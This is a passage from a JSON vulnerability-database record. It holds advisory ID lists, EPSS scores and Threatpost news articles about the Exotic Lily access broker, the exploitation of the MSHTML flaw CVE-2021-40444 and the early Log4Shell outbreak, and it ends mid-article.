"THREATPOST:40A09F08F388BACF08E0931C6473DE0C", "THREATPOST:40A6B1288BA6177BA30307804BE630D0", "THREATPOST:41B10746D1F4B74DA188CB140A8B2676", "THREATPOST:42AAB266C740220CFF57204DDF71129E", "THREATPOST:436D209F4CB01B99FC9576DFE08DE145", "THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:46AF5D5C752ADF689DA52FBDA4644F5D", "THREATPOST:47481707E9A4BF7FC15CC47EC8A8F249", "THREATPOST:48A631F2D45804C677BB672F838F29DA", "THREATPOST:48FD4B4BFA020778797D684672C283B0", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:4B8076F30D5D67336733D7FFBCBD929A", "THREATPOST:4C8D995307A845304CF691725B2352A2", "THREATPOST:4C9E0FFA5C914E395A66D2DC65B16649", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:4D892A0342695D6703703D63DCC1877C", "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "THREATPOST:503327A6AB0C76621D741E281ABCFF77", "THREATPOST:5531DA413E023731C17E5B0771A25B3D", "THREATPOST:57F52943964BADEBC748C4AC796CEEB6", "THREATPOST:590E1D474E265F02BA634F492F728536", "THREATPOST:5B680BEF3CD53FFB3B871FF7365A4C47", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5C1E777F8F9FC173EF97E95D8AFAA5F2", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:5F6690E820E1B143D99DD5974300C6FF", "THREATPOST:6067B6D35C99BFCFF226177541A31F69", "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "THREATPOST:647D7D894452D9C46B3E86F5491EED49", "THREATPOST:65DB14FD89BCDBD3391ADD70F1377E70", "THREATPOST:65F4E74D349524EBAC2DA4A4ECF22DD8", "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "THREATPOST:68B92CE2FE5B31FB78327BDD0AB7F21C", "THREATPOST:6C547AAC30142F12565AB289E211C079", "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "THREATPOST:78327DA051387C43A61D82DE6B618D1F", "THREATPOST:795C39123EE147B39072C9434899E8FE", "THREATPOST:796DFA4804FEF04D3787893FCDFF97D2", "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "THREATPOST:81021088670E95FC0EBB2F53E1FB2AD2", "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "THREATPOST:81DEAED9A2A367373ADA49F1CCDCA95D", "THREATPOST:8243943141B8F18343765DA77D33F46C", "THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "THREATPOST:8601D6EF6AB3201E582A218391B19C3F", "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "THREATPOST:883A7DED46A4E1C743AFFBA7CDCF4400", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:8B78588647E8548B06361DBB1F279468", "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "THREATPOST:932AA74F12B9D2AD0E8589AC1A2C1438", "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "THREATPOST:970C9E73DF1FF53D70DB0B66326F3CB0", "THREATPOST:97D06649A596B5E25E2A11E3D275748B", "THREATPOST:97F7CB48069CDF8038E5E49508EFA458", "THREATPOST:987673B6BC03D7371ADC88E9BDA270D5", "THREATPOST:98F735BF442C3126E4A9FFBB60517B96", "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "THREATPOST:9D96113FADFD4FBCA9C17B78B53A8C93", "THREATPOST:9E222E9232D1D59183559B17E97BADCD", "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "THREATPOST:A1F3E8AC4878C11E48F90AC47D165F52", "THREATPOST:A6096ACCB3F0C38BC6570E1DDE3E8844", "THREATPOST:AB54F1EB518D88546D1EF9DBA5E1874B", "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B04DD1402960F4726546F62371A02B3C", "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "THREATPOST:B9CCF4B8B7E25CEC369B248303882707", "THREATPOST:BA0FA5036C385C822C787514850A67E5", "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "THREATPOST:C573D419AD6106E6579CCA4A18E2DBBE", "THREATPOST:C694354BA14A953DAFC9171CB97F0BC2", "THREATPOST:C6D292755B4D35E7E0FD459BBF6AFC7F", "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "THREATPOST:CAA9AA939562959323A4675228C233A5", "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "THREATPOST:CF3033203781AAC4EAAE83DDCF93ADE8", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:D098942E4435832E619282E1B92C9E0F", "THREATPOST:D240DF7FEF328139784DBE743FF84E9B", "THREATPOST:D358CF7B956451F0C53F878AF811409F", "THREATPOST:D5E02B5FD2809DCACF41DA1190794921", "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "THREATPOST:DB4349EAC3DD60D03D1EBDEFF8ABAA8E", "THREATPOST:DC76A72269F271882F45A521CF7C3509", "THREATPOST:DD0FE8D3D9D205FA5CCA65C3EBDD62D2", "THREATPOST:DE6A0C7ECE2973F596891B00DC078055", "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "THREATPOST:E09CE3FA2B76F03886BA3C2D4DB4D8DB", "THREATPOST:E0C8A3622AEF61D726EED997C39BADFE", "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "THREATPOST:E60D2D0CCA5A225CA4BF5CEB5C7C3F59", "THREATPOST:E8074A338A246BED98CF95AD4F4E9CAF", "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "THREATPOST:EE0A71A925297032000651C344890BDD", "THREATPOST:F12423DD382283B0E48D4852237679FC", "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02", "TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-4104", "UB:CVE-2021-44228", "UB:CVE-2021-45046"]}, {"type": "veracode", "idList": ["VERACODE:33244", "VERACODE:33337", "VERACODE:33348"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.1", "VMSA-2021-0028.10", "VMSA-2021-0028.11", "VMSA-2021-0028.12", "VMSA-2021-0028.13", "VMSA-2021-0028.2", "VMSA-2021-0028.3", "VMSA-2021-0028.4", "VMSA-2021-0028.6", "VMSA-2021-0028.7", "VMSA-2021-0028.8", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "wordfence", "idList": ["WORDFENCE:45390D67D024DD8C963E18DAE88303B2"]}, {"type": "zdt", "idList": ["1337DAY-ID-37126", "1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37228", "1337DAY-ID-37257", "1337DAY-ID-37264", "1337DAY-ID-37889"]}]}, "epss": [{"cve": "CVE-2021-40444", "epss": "0.966120000", "percentile": "0.993310000", "modified": "2023-03-19"}, {"cve": "CVE-2021-44228", "epss": "0.975780000", "percentile": "0.999980000", "modified": "2023-03-19"}], "vulnersScore": 1.2}, "_state": {"dependencies": 1659988328, "score": 1684013994, "epss": 1679287418}, "_internal": {"score_hash": "f33ff24f6f2109e10f3cd0677177dada"}}

{"threatpost": [{"lastseen": "2022-03-18T14:56:17", "description": "Google\u2019s Threat Analysis Group (TAG) has provided a rare look inside the operations of a cybercriminal dubbed \u201cExotic Lily,\u201d that appears to serve as an initial-access broker for both Conti and Diavol ransomware gangs.\n\nResearchers\u2019 analysis exposes the business-like approach the group takes to brokering initial access into organizations\u2019 networks through a range of tactics so its partners can engage in further malicious activity.\n\nWhile ransomware actors tend to get most of the attention, they can\u2019t do their dirty work without first gaining access to an organization\u2019s network. This is often the job of what are called initial-access brokers (IABs), or \u201cthe opportunistic locksmiths of the security world,\u201d as Google TAG calls them in [a blog post](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>) published Thursday.\n\n\u201cIt\u2019s a full-time job,\u201d Google TAG researchers Vlad Stolyarov and Benoit Sevens wrote in the post. \u201cThese groups specialize in breaching a target in order to open the doors \u2014 or the Windows \u2014 to the malicious actor with the highest bid.\u201d\n\nGoogle TAG first encountered Exotic Lily last September, when the group was doing just that \u2014 exploiting the [zero-day Microsoft flaw](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>) in MSHTML ([CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>)) as part of what turned out to be a full-time IAB business \u201cclosely linked with data exfiltration and deployment of human-operated ransomware such as Conti and Diavol,\u201d researchers wrote.\n\nAt the peak of the group\u2019s activity, Exotic Lily \u2014 which researchers believe is working with the Russian cybercrime gang known as FIN12, [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) or DEV-0413 \u2014 was sending more than 5,000 emails a day to as many as 650 targeted organizations globally, they said.\n\n\u201cUp until November 2021, the group seemed to be targeting specific industries such as IT, cybersecurity and healthcare, but as of late we have seen them attacking a wide variety of organizations and industries, with less specific focus,\u201d researchers wrote in the post.\n\n## **Soup to Nuts**\n\nExotic Lily works ostensibly as a full-time cybercrime business, which might be described as a \u201csoup to nuts\u201d organization if it were actually a legitimate company.\n\nThe group has maintained a \u201crelatively consistent attack chain\u201d during the time it was being tracked by researchers with its operators \u201cworking a fairly typical 9-to-5 job, with very little activity during the weekends,\u201d researchers wrote. Working hours indicated that the group is likely operating out of a Central or Eastern European time zone.\n\nThe group\u2019s tactics include initial activity to build fake online personas\u2014including social-media profiles with AI-generated photos\u2014that spoof both identities and company domains to ensure it appears as an authentic entity to its targets when carrying out phishing, researchers revealed.\n\nIn fact, in November, Google TAG observed the group impersonating real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.\n\n\u201cIn the majority of cases, a spoofed domain name was identical to a real domain name of an existing organization, with the only difference being a change of TLD to \u201c.us\u201d, \u201c.co\u201d or \u201c.biz,\u201d researchers wrote.\n\n## **Full-Time Phishing Business**\n\nWhile bug exploitation is part of its work as noted, Exotic Lily\u2019s main business operation is to use these spoofed email accounts to send [spear-phishing](<https://threatpost.com/spear-phishing-exploits-glitch-steal-credentials/176449/>) emails. They often purport to be a business proposal, such as seeking to outsource a software-development project or an information-security service.\n\nOne unique aspect of the group\u2019s method is to engage in more follow-up communications with targets than most cybercriminals behind phishing campaigns typically do, researchers observed. This activity includes operators\u2019 attempting to schedule a meeting to discuss a project\u2019s design or requirements or engaging in other communication to gain affinity and trust, they said.\n\nIn its final attack stage, Exotic Lily uploads an ultimate payload to a public file-sharing service such as TransferNow, TransferXL, WeTransfer or OneDrive, and then uses a built-in email notification feature to share the file with the target.\n\nThis tactic serves to help the group\u2019s malicious motives evade detection, as the final email originates from the email address of a legitimate file-sharing service and not the attacker\u2019s email, researchers noted.\n\n## **Payload Delivery**\n\nTypically, the actors upload another group\u2019s malware to the file-sharing service prior to sharing it with the target, researchers said. While some samples of malware appear custom, Google TAG doesn\u2019t think it\u2019s Exotic Lily who\u2019s developing these binaries.\n\nThough their first observation of the group was the use of documents exploiting the MSHTML bug, researchers later observed Exotic Lily changing its delivery tactics to use ISO archives that include shortcuts to the [BazarLoader dropper](<https://threatpost.com/bazarloader-malware-slack-basecamp/165455/>), according to the post.\n\nThis month, Google observed the group delivering ISO files with a custom loader that drops malware dubbed Bumblebee, which uses Windows Management Instrumentation (WMI) to collect various system details such as OS version, username and domain name. These details are then exfiltrated in JSON format to a command-and-control server (C2), researchers said.\n\nBumblebee also can execute commands and code from the C2, and in recent activity was seen fetching Cobalt Strike payloads to be executed on targeted systems, they added.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T14:49:01", "type": "threatpost", "title": "Google Blows Lid Off Conti, Diavol Ransomware Access-Broker Ops", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-03-18T14:49:01", "id": "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "href": "https://threatpost.com/google-conti-diavol-ransomware-access-broker/178981/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-17T12:16:20", "description": "Criminals behind the Ryuk ransomware were early exploiters of the Windows MSHTML flaw, actively leveraging the bug in campaigns ahead of a patch released by [Microsoft](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>) this week.\n\nCollaborative research by Microsoft and RiskIQ revealed campaigns by Ryuk threat actors early on that exploited the flaw, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The bug is a remote code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents. The two [released](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) [separate reports](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>) online this week to provide a look into who has been using the flaw\u2013which can be used to hide a malicious ActiveX control in an Office document\u2013in attacks, as well as their potential connections to known criminal groups.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nSpecifically, most of the attacks that researchers analyzed used MSHTML as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders, which communicated with an infrastructure that is associated with multiple cybercriminal campaigns\u2013including human-operated ransomware, researchers from the Microsoft 365 Defender Threat Intelligence Team at the Microsoft Threat Intelligence Center (MSTIC) reported.\n\nRiskIQ identified the ransomware infrastructure as potentially belonging to the Russian-speaking [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) crime syndicate, known to maintain and distribute Ryuk ransomware.\n\n\u201cBased on multiple overlapping patterns in network infrastructure setup and use, we assess with high confidence that the operators behind the zero-day campaign are using infrastructure affiliated with Wizard Spider (CrowdStrike), and/or related groups UNC1878 (FireEye/Mandiant) and Ryuk (public), who continue to use Ryuk/Conti and BazaLoader/BazarLoader malware in targeted ransomware campaigns,\u201d RiskIQ\u2019s Team Atlas wrote in its analysis.\n\nMicrosoft stopped short of specifically identifying the threat actors observed exploiting the MSHTML flaw, instead referring to unidentified perpetrators as \u201cdevelopment groups\u201d using the prefix \u201cDEV\u201d and a number to indicate an emerging threat group.\n\n## **Separate Campaigns, Threat Actors**\n\nIn its analysis, the company cites activity from three DEV groups since August that have been seen in attacks leveraging CVE-2021-40444: DEV-0365, DEV-0193 and DEV-0413.\n\nThe infrastructure the company associates with DEV-0365 was used in the Cobalt Strike campaigns and follow-on activity, indicating \u201cmultiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware),\u201d according to researchers. However, DEV-0365 potentially may be involved only as a command-and-control infrastructure as a service for cybercriminals, the company said.\n\n\u201cAdditionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads \u2014 activity that overlaps with a group Microsoft tracks as DEV-0193,\u201d the team said.\n\nMicrosoft attributed another campaign using the vulnerability to a group identified as DEV-0413. This campaign is \u201csmaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure,\u201d and was observed exploiting the flaw as early as Aug. 18.\n\nThe campaign used a social-engineering lure that aligned with the business operations of targeted organizations, \u201csuggesting a degree of purposeful targeting,\u201d the company observed.\n\n\u201cThe campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted,\u201d they wrote. \u201cIn most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.\u201d\n\n## **History of a Vulnerability**\n\nMicrosoft first [revealed](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>) the MSHTML zero-day vulnerability on Sept. 7, joining the Cybersecurity and Infrastructure Security Agency (CISA) in warning organizations of the bug and urging mitigations in separate alerts released that day.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \nSomeone would have to open the malicious document for an attack to be successful, the company said. This is why attackers use email campaigns with lures that appear relevant to their targets in the hopes that they will launch embedded documents, researchers said.\n\nIndeed, at least one of the campaigns Microsoft researchers observed included emails impersonating contracts and legal agreements to try to trick victims to opening the documents to distribute the payload.\n\nThough it\u2019s not completely certain if Wizard Spider is behind some of these early attacks, it\u2019s clear that ransomware operators are interested in exploiting the MSHTML flaw, according to RiskIQ.\n\nHowever, at this point, \u201cwe assume there has been limited deployment of this zero-day,\u201d researchers wrote. That means that even if known ransomware criminals are involved in the attacks, delivering ransomware may not be the ultimate goal of the campaigns, they observed.\n\n\u201cInstead, we assess with medium confidence that the goal of the operators behind the zero-day may, in fact be traditional espionage,\u201d RISKIQ\u2019s Team Atlas wrote. \u201cThis goal could easily be obscured by a ransomware deployment and blend into the current wave of targeted ransomware attacks.\u201d\n\nNo matter, organizations should take advantage of the patch Microsoft released this week for the vulnerability and update their systems now before more attacks occur, the company reiterated. \u201cCustomers are advised to apply the [security patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for CVE-2021-40444 to fully mitigate this vulnerability,\u201d the MSTIC team wrote.\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-17T12:07:59", "type": "threatpost", "title": "Microsoft MSHTML Flaw Exploited by Ryuk Ransomware Gang", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T12:07:59", "id": "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "href": "https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-08T12:29:02", "description": "Both Microsoft and federal cybersecurity officials are urging organizations to use mitigations to combat a zero-day remote control execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\nMicrosoft has not revealed much about the MSHTML bug, tracked as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), beyond that it is \u201caware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\u201d according to an advisory released Tuesday.\n\nHowever, it\u2019s serious enough that the Cybersecurity and Infrastructure Security Agency (CISA) released [an advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>) of its own alerting users and administrators to the vulnerability and recommending that they use the mitigations and workarounds Microsoft recommends.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)The attacker would then have to convince the user to open the malicious document for an attack to be successful, the company said. Moreover, users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights, according to the advisory.\n\n## **Affecting More than Office**\n\nThough Microsoft is still investigating the vulnerability, it could prove to go beyond affecting just Microsoft Office documents due to the ubiquitous use of MSHTML on Windows, warned Jake Williams, co-founder and CTO at incident response firm [BreachQuest](<https://breachquest.com/>).\n\n\u201cIf you\u2019ve ever opened an application that seemingly \u2018magically\u2019 knows your proxy settings, that\u2019s likely because it uses MSHTML under the hood,\u201d he said in an e-mail to Threatpost. \u201cVulnerabilities like these tend to have extremely long lifetimes for exploitation in the wild.\u201d\n\nEven if the vulnerability\u2019s reach does not go beyond Office documents, its presence and the fact that attackers are already trying to exploit are worrisome enough for organizations to take immediate action, noted another security professional.\n\nMalicious Office documents are a popular tactic with cybercriminals and state-sponsored threat actors, and the vulnerability give them \u201cmore direct exploitation of a system and the usual tricking users to disable security controls,\u201d observed John Bambenek, principal threat hunter at digital IT and security operations firm [Netenrich](<https://netenrich.com/>).\n\n\u201cAs this is already being exploited, immediate patching should be done,\u201d he advised. \u201cHowever, this is a stark reminder that in 2021, we still can\u2019t send documents from point A to point B securely.\u201d\n\n## **Mitigations and Workarounds**\n\nMicrosoft has offered some advice for organizations affected by the vulnerability\u2014first discovered by Rick Cole of the Microsoft Security Response Center, Haifei Li of EXPMON, and Dhanesh Kizhakkinan, Bryce Abdo and Genwei Jiang of Mandiant\u2013until it can offer its own security update. That may come in the form of a Patch Tuesday fix or an out-of-band patch, depending on what researchers discover, the company said.\n\nUntil then, customers should keep anti-malware products up to date, though those who use automatic updates don\u2019t need to take action now, Microsoft said. For enterprise customers who manage updates, they should select the detection build 1.349.22.0 or newer and deploy it across their environments, the company added.\n\nWorkarounds for the flaw include disabling the installation of all ActiveX controls in Internet Explorer, which mitigates a potential attack, according to Microsoft.\n\n\u201cThis can be accomplished for all sites by updating the registry,\u201d the company said in its advisory. \u201cPreviously-installed ActiveX controls will continue to run, but do not expose this vulnerability.\u201d\n\nHowever, Microsoft warned organizations to take care when using the Registry Editor, because doing so incorrectly can \u201ccause serious problems that may require you to reinstall your operating system.\u201d \u201cUse Registry Editor at your own risk,\u201d the company advised.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {}, "published": "2021-09-08T12:24:51", "type": "threatpost", "title": "Microsoft, CISA Urge Mitigations for Zero-Day RCE Flaw in Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T12:24:51", "id": "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "href": "https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-14T18:10:35", "description": "The internet has a fast-spreading, malignant cancer \u2013 otherwise known as the Apache Log4j logging library exploit \u2013 that\u2019s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.\n\nMost of the attacks focus on cryptocurrency mining done on victims\u2019 dimes, as seen by [Sophos](<https://twitter.com/SophosLabs/status/1470213371521810432>), [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/?ranMID=24542&ranEAID=TnL5HPStwNw&ranSiteID=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&epi=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&irgwc=1&OCID=AID2200057_aff_7593_1243925&tduid=%28ir__cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600%29%287593%29%281243925%29%28TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA%29%28%29&irclickid=_cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600>) and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.\n\nAccording to [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) researchers, beyond coin-miners, they\u2019ve also seen installations of [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), which attackers can use to steal passwords, creep further into compromised networks with lateral movement and exfiltrate data.\n\nAlso, it could get a lot worse. Cybersecurity researchers at [Check Point warned](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) on Monday that the evolution has already led to more than 60 bigger, brawnier mutations, all spawned in less than a day.\n\n\u201cSince Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly: over 60 in less than 24 hours,\u201d they said.\n\nThe flaw, which is uber-easy to exploit, has been named [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>). It\u2019s resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated remote code execution (RCE) and complete server takeover. It first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft, last Thursday, and was being exploited in the wild within hours of public disclosure.\n\n## Mutations May Enable Exploits to Slip Past Protections\n\nOn Monday, Check Point reported that Log4Shell\u2019s new, malignant offspring can now be exploited \u201ceither over HTTP or HTTPS (the encrypted version of browsing),\u201d they said.\n\nThe more ways to exploit the vulnerability, the more alternatives attackers have to slip past the new protections that have frantically been pumped out since Friday, Check Point said. \u201cIt means that one layer of protection is not enough, and only multilayered 